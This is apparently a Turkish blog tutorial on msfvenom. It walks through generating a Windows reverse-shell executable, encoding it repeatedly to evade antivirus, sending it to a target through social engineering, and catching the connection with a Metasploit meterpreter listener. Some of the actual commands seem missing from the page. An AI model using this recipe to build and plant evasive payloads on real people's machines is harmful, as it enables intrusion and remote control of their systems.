Msfvenom Nedir Ne İçin Kullanılır ?

Msfvenom , metasploit projesi altında çalışan bir payload üretme aracıdır. Msfvenom ile payload üretmek için öncelikle payload seçilir. Payload türlerini görmek için terminal ekranına

Yazılarak kullanılcak olan payload ‘ları gösterir bu sayede isteğinize göre payload seçip kullanabilirsiniz. Payload seçtikten sonra ise -p parametresi ile payloadımızı berlitiyoruz.

msfvenom komutları

-p parametresinden sonra payload’ımızı belirttik ve ardından ip ve port bilgimizi girdik. Gelecek olan bağlantıyı almak için doğru girmeniz lazım yazarken dikkat edin. Ayrıca dış ağ için yapıcaksanız port açmanız gerekmektedir. -X parametresi ile çıkış ekranını verdiriyoruz yani exe uzantılı bir şekilde çıkacak diyip ardından uygulama ismini veriyoruz.

Virüs programlarına yakalanmamak için -i parametresi kullanılmakta -i 20 gibi bir parametre verirsek bu yazılımın 20 kez encode edileceğini söylemekte. Bu sayede kaynak kod şifrelenceği için virüs programlarının bulması zorlaşacaktır.

Oluşturduğumuz yazılımı hedef makineye atıyoruz. Metasploit aracımız ile istekleri dinlemeye alıyoruz. Eğer hedef kişi zararlı yazılımı açarsa terminal erişimi alıyoruz ve hedef kişiye sızmış oluyoruz. Sosyal mühendislik saldırılarında çok kullanılan bir yöntemdir. Metasploit ‘i çalıştırdıktan sonra yazılımı oluştururken verdiğimiz payload ‘ı metasploit ‘de seçiyoruz. set payload windows/meterpreter/reverse_tcp komutu ile payload seçimini yapmış oluyoruz. Show options komutu ile bizden istenen bilgileri dolduruyoruz. Yazılımda yaptığımız ip ve port bilgisini burda da aynı şekilde girmemiz gerek çünkü bağlantının bize gelmesi lazım. set LHOST (ip) , set LPORT (port) şeklinde belirttikten sonra run yada exploit yazarak dinleme işlemine geçiyoruz. Artık program çalıştığı an bize istek gelcek ve terminal erişimi sağlayabileceğiz.

Bu konumuzun da sonuna geldik umarım Siber Güvenlik alanında bilgiler kapabilmişsinizdir.

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir